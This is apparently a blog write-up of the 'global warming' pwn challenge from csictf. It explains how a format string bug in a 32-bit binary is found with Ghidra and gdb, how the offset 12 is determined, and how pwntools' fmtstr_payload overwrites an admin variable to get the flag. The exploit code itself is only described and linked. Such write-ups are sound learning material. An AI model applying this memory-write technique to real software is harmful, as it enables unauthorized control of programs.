Hello guys this is a write-up about global warming challenge, if you don't have the binary downloaded go ahead and download it from here (you will find the exploit as well) :
https://github.com/MaherAzzouzi/PWNing/tree/master/csictf
File :
We're dealing with a 32 bits binary, not stripped which makes it easier for us to reverse engineer the binary.
Checksec :
* PIE disabled so the address of the binary stays the same in every run.
Playing with the binary :
We can see that the binary suffer from format string vulnerability.
Let's open up ghidra and see what the binary actually do.
Reverse engineering :
Let's open up ghidra and make a new project name it "global-warming" and then open our binary file and click analyze.
search for the main function and see what's doing :
This what main do, it gets 0x400 data into an array of 1024 bytes
no buffer overflow
I'm more interested in login() function.
This is what login() function do:
* Compare the content of admin (this reside in the bss section) to this -0x4b24541d if they are the same we got the flag.
if we double click admin we get it's address :
But this value -0x4b24541d doesn't seem to be correct, let's make sure using gdb.
This is login() disassembly in gdb :
We can see cmp in login + 38 compare admin with 0xb4dbabe3
Exploit :
To get the flag all we need to is to write 0xb4dbabe3 to 0x0804c02c (admin)
To exploit it all we have to do is this :
Because it's a 32 bits binary I provided just 4*"A" and search for it using %p %p ... %p
You can count by yourself and see that 0x41414141 appears in the 12th position after AAAA
Please remember the number 12 we will be using it in our exploit.
Now we will be using pwntools to generate a payload that will write 0xb4dbabe3 to admin just in two lines of code :)
This is the final exploit, you simply do fmtstr_payload(12_that_we_calculated_before , write) and write dictionary is simply what to write, where.
Let's test the exploit remotely :
Enjoy !
Comments
Post a Comment